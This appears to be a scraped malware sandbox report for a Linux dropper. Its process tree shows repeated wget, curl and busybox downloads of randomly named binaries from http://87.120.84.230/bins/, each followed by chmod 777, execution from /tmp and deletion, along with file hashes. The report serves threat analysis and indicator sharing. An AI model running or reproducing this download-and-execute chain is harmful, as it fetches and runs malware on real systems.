/usr/bin/wgetwget http://87.120.84.230/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:944
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:950
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:956
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:962
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97